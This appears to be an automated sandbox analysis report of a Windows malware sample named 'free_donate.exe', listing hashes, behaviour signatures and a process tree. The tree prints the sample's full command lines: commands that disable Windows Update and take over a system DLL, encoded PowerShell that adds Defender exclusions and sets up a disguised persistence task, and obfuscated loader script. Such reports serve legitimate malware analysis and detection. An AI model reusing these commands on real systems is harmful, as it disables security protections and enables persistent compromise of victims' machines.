Analysis
-
max time kernel
10s -
max time network
59s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system -
submitted
17-11-2022 21:41
Static task
static1
General
-
Target
free_donate.exe
-
Size
2.7MB
-
MD5
5026ed09cc5a093093461066d16a8f30
-
SHA1
34d60b874d9d3f8841c721692ea1daf31f330653
-
SHA256
b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3
-
SHA512
2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1
-
SSDEEP
49152:HgJH+Kol630+0DW0TOWxKyuPcMPgBAnDEQ1o/40fyNHpElUZ7lPP:AJgl630pBTXVGhPYzQ1o//wElulH
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
description / ioc / process:
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
-
Drops file in Drivers directory 1 IoCs
Processes:
description / ioc / process:
- File opened for modification C:\Windows\system32\drivers\etc\hosts (free_donate.exe)
-
Possible privilege escalation attempt 2 IoCs
Processes:
pid / process:
- PID 2160 takeown.exe
- PID 3204 icacls.exe
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description / ioc / process:
- Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation (free_donate.exe)
-
Modifies file permissions 1 TTPs 2 IoCs
Processes:
pid / process:
- PID 2160 takeown.exe
- PID 3204 icacls.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow / ioc:
- flow 23: ip-api.com
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description / pid / process / target process:
- PID 780 set thread context of PID 3512 (free_donate.exe -> conhost.exe)
-
Drops file in Windows directory 4 IoCs
Processes:
description / ioc / process:
- File created C:\Windows\Tasks\dialersvc32.job (conhost.exe)
- File opened for modification C:\Windows\Tasks\dialersvc32.job (conhost.exe)
- File created C:\Windows\Tasks\dialersvc64.job (conhost.exe)
- File opened for modification C:\Windows\Tasks\dialersvc64.job (conhost.exe)
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid / process:
- PID 3396 sc.exe
- PID 4972 sc.exe
- PID 3640 sc.exe
- PID 4028 sc.exe
- PID 2436 sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 9 IoCs
Processes:
pid / process:
- PID 3132 reg.exe
- PID 2472 reg.exe
- PID 3804 reg.exe
- PID 2736 reg.exe
- PID 4612 reg.exe
- PID 1792 reg.exe
- PID 4544 reg.exe
- PID 1920 reg.exe
- PID 3740 reg.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
pid / process:
- PID 4320 powershell.exe
- PID 4320 powershell.exe
- PID 780 free_donate.exe
- PID 428 powershell.exe
-
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
description / pid / process:
- Token: SeDebugPrivilege, PID 4320 powershell.exe
- Token: SeDebugPrivilege, PID 780 free_donate.exe
- Token: SeShutdownPrivilege, PID 4868 powercfg.exe
- Token: SeCreatePagefilePrivilege, PID 4868 powercfg.exe
- Token: SeShutdownPrivilege, PID 1036 powercfg.exe
- Token: SeCreatePagefilePrivilege, PID 1036 powercfg.exe
- Token: SeShutdownPrivilege, PID 32 powercfg.exe
- Token: SeCreatePagefilePrivilege, PID 32 powercfg.exe
- Token: SeShutdownPrivilege, PID 2352 powercfg.exe
- Token: SeCreatePagefilePrivilege, PID 2352 powercfg.exe
- Token: SeTakeOwnershipPrivilege, PID 2160 takeown.exe
- Token: SeDebugPrivilege, PID 428 powershell.exe
-
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
description / pid / process / target process (51 entries; identical rows collapsed, count shown):
- PID 780 wrote to memory of 4320 (free_donate.exe -> powershell.exe), 2 entries
- PID 780 wrote to memory of 524 (free_donate.exe -> cmd.exe), 2 entries
- PID 780 wrote to memory of 372 (free_donate.exe -> cmd.exe), 2 entries
- PID 524 wrote to memory of 2436 (cmd.exe -> sc.exe), 2 entries
- PID 524 wrote to memory of 3396 (cmd.exe -> sc.exe), 2 entries
- PID 372 wrote to memory of 4868 (cmd.exe -> powercfg.exe), 2 entries
- PID 524 wrote to memory of 3640 (cmd.exe -> sc.exe), 2 entries
- PID 524 wrote to memory of 4972 (cmd.exe -> sc.exe), 2 entries
- PID 372 wrote to memory of 1036 (cmd.exe -> powercfg.exe), 2 entries
- PID 524 wrote to memory of 4028 (cmd.exe -> sc.exe), 2 entries
- PID 372 wrote to memory of 32 (cmd.exe -> powercfg.exe), 2 entries
- PID 524 wrote to memory of 1920 (cmd.exe -> reg.exe), 2 entries
- PID 372 wrote to memory of 2352 (cmd.exe -> powercfg.exe), 2 entries
- PID 524 wrote to memory of 3740 (cmd.exe -> reg.exe), 2 entries
- PID 524 wrote to memory of 3804 (cmd.exe -> reg.exe), 2 entries
- PID 524 wrote to memory of 4612 (cmd.exe -> reg.exe), 2 entries
- PID 524 wrote to memory of 2736 (cmd.exe -> reg.exe), 2 entries
- PID 524 wrote to memory of 2160 (cmd.exe -> takeown.exe), 2 entries
- PID 524 wrote to memory of 3204 (cmd.exe -> icacls.exe), 2 entries
- PID 780 wrote to memory of 3512 (free_donate.exe -> conhost.exe), 11 entries
- PID 780 wrote to memory of 428 (free_donate.exe -> powershell.exe), 2 entries
Processes
-
C:\Users\Admin\AppData\Local\Temp\free_donate.exe (level 1)
Command line: "C:\Users\Admin\AppData\Local\Temp\free_donate.exe"
- Drops file in Drivers directory
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe (level 2)
Command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exe (level 3)
Command line: sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 3)
Command line: sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 3)
Command line: sc stop bits
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 3)
Command line: sc stop wuauserv
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 3)
Command line: sc stop dosvc
- Launches sc.exe
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
- Modifies registry key
-
C:\Windows\system32\takeown.exe (level 3)
Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe (level 3)
Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\schtasks.exe (level 3)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
-
C:\Windows\system32\schtasks.exe (level 3)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
-
C:\Windows\system32\schtasks.exe (level 3)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
-
C:\Windows\system32\schtasks.exe (level 3)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
-
C:\Windows\System32\cmd.exe (level 2)
Command line: "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exe (level 3)
Command line: powercfg /x -hibernate-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe (level 3)
Command line: powercfg /x -hibernate-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe (level 3)
Command line: powercfg /x -standby-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe (level 3)
Command line: powercfg /x -standby-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exe (level 2)
Command line: C:\Windows\System32\conhost.exe
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYwB4AG4AIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABBAEEAZAB3AEEAagBBAEQANABBAEkAQQBCAFQAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEATABRAEIAUQBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBBAEEATABRAEIARwBBAEcAawBBAGIAQQBCAGwAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAEkAQQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBjAEEARQBNAEEAYQBBAEIAeQBBAEcAOABBAGIAUQBCAGwAQQBGAHcAQQBkAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAdABBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBJAEEAQgBTAEEASABVAEEAYgBnAEIAQgBBAEgATQBBAEkAQQBBADgAQQBDAE0AQQBhAFEAQgAwAEEAQwBNAEEAUABnAEEAPQAiACcAKQAgADwAIwB6AHIAbABtACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAdwBzACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAZQB1AHEAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbw
ByAGMAZQAgADwAIwBpAGEAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABmAHIAZQBlAF8AZABvAG4AYQB0AGUALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBvAHUAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAGEAdgBhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE (level 1)
Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (level 1)
Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
-
C:\Windows\System32\dllhost.exe (level 1)
Command line: C:\Windows\System32\dllhost.exe /Processid:{cb25963d-30eb-4752-8ef6-c1bd9fda8cb7}
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize 2KB
MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 944B
MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
- memory/32-147-0x0000000000000000-mapping.dmp
- memory/372-138-0x0000000000000000-mapping.dmp
- memory/428-165-0x00007FFC3A920000-0x00007FFC3B3E1000-memory.dmp (Filesize 10.8MB)
- memory/428-161-0x0000000000000000-mapping.dmp
- memory/524-137-0x0000000000000000-mapping.dmp
- memory/744-175-0x00000000044A0000-0x00000000044C2000-memory.dmp (Filesize 136KB)
- memory/744-171-0x0000000004660000-0x0000000004C88000-memory.dmp (Filesize 6.2MB)
- memory/744-169-0x0000000003EB0000-0x0000000003EE6000-memory.dmp (Filesize 216KB)
- memory/744-176-0x0000000004D90000-0x0000000004DF6000-memory.dmp (Filesize 408KB)
- memory/744-178-0x0000000004E00000-0x0000000004E66000-memory.dmp (Filesize 408KB)
- memory/780-173-0x00007FFC3A920000-0x00007FFC3B3E1000-memory.dmp (Filesize 10.8MB)
- memory/780-139-0x000000001C7D0000-0x000000001C7E2000-memory.dmp (Filesize 72KB)
- memory/780-132-0x0000000000A10000-0x0000000000CC8000-memory.dmp (Filesize 2.7MB)
- memory/780-133-0x00007FFC3A920000-0x00007FFC3B3E1000-memory.dmp (Filesize 10.8MB)
- memory/924-172-0x0000000000000000-mapping.dmp
- memory/1036-145-0x0000000000000000-mapping.dmp
- memory/1692-189-0x00007FFC56DB0000-0x00007FFC56E6E000-memory.dmp (Filesize 760KB)
- memory/1692-188-0x00007FFC58C90000-0x00007FFC58E85000-memory.dmp (Filesize 2.0MB)
- memory/1692-180-0x00007FFC56DB0000-0x00007FFC56E6E000-memory.dmp (Filesize 760KB)
- memory/1692-179-0x00007FFC58C90000-0x00007FFC58E85000-memory.dmp (Filesize 2.0MB)
- memory/1692-174-0x00007FFC3A920000-0x00007FFC3B3E1000-memory.dmp (Filesize 10.8MB)
- memory/1792-167-0x0000000000000000-mapping.dmp
- memory/1876-170-0x0000000000000000-mapping.dmp
- memory/1920-148-0x0000000000000000-mapping.dmp
- memory/2160-154-0x0000000000000000-mapping.dmp
- memory/2352-149-0x0000000000000000-mapping.dmp
- memory/2436-140-0x0000000000000000-mapping.dmp
- memory/2472-166-0x0000000000000000-mapping.dmp
- memory/2736-153-0x0000000000000000-mapping.dmp
- memory/3132-164-0x0000000000000000-mapping.dmp
- memory/3204-155-0x0000000000000000-mapping.dmp
- memory/3396-141-0x0000000000000000-mapping.dmp
- memory/3432-177-0x0000000000000000-mapping.dmp
- memory/3512-158-0x0000000140000000-0x0000000140056000-memory.dmp (Filesize 344KB)
- memory/3512-156-0x0000000140000000-0x0000000140056000-memory.dmp (Filesize 344KB)
- memory/3512-160-0x0000000140000000-0x0000000140056000-memory.dmp (Filesize 344KB)
- memory/3512-159-0x0000000140000000-0x0000000140056000-memory.dmp (Filesize 344KB)
- memory/3512-157-0x0000000140001844-mapping.dmp
- memory/3640-143-0x0000000000000000-mapping.dmp
- memory/3740-150-0x0000000000000000-mapping.dmp
- memory/3804-151-0x0000000000000000-mapping.dmp
- memory/4028-146-0x0000000000000000-mapping.dmp
- memory/4200-190-0x0000000140000000-0x0000000140042000-memory.dmp (Filesize 264KB)
- memory/4200-187-0x00007FFC56DB0000-0x00007FFC56E6E000-memory.dmp (Filesize 760KB)
- memory/4200-186-0x00007FFC58C90000-0x00007FFC58E85000-memory.dmp (Filesize 2.0MB)
- memory/4200-182-0x0000000140000000-0x0000000140042000-memory.dmp (Filesize 264KB)
- memory/4200-183-0x00000001400033F4-mapping.dmp
- memory/4200-184-0x0000000140000000-0x0000000140042000-memory.dmp (Filesize 264KB)
- memory/4200-185-0x0000000140000000-0x0000000140042000-memory.dmp (Filesize 264KB)
- memory/4320-135-0x000001EF78720000-0x000001EF78742000-memory.dmp (Filesize 136KB)
- memory/4320-134-0x0000000000000000-mapping.dmp
- memory/4320-136-0x00007FFC3A920000-0x00007FFC3B3E1000-memory.dmp (Filesize 10.8MB)
- memory/4400-181-0x0000000000000000-mapping.dmp
- memory/4544-168-0x0000000000000000-mapping.dmp
- memory/4612-152-0x0000000000000000-mapping.dmp
- memory/4868-142-0x0000000000000000-mapping.dmp
- memory/4972-144-0x0000000000000000-mapping.dmp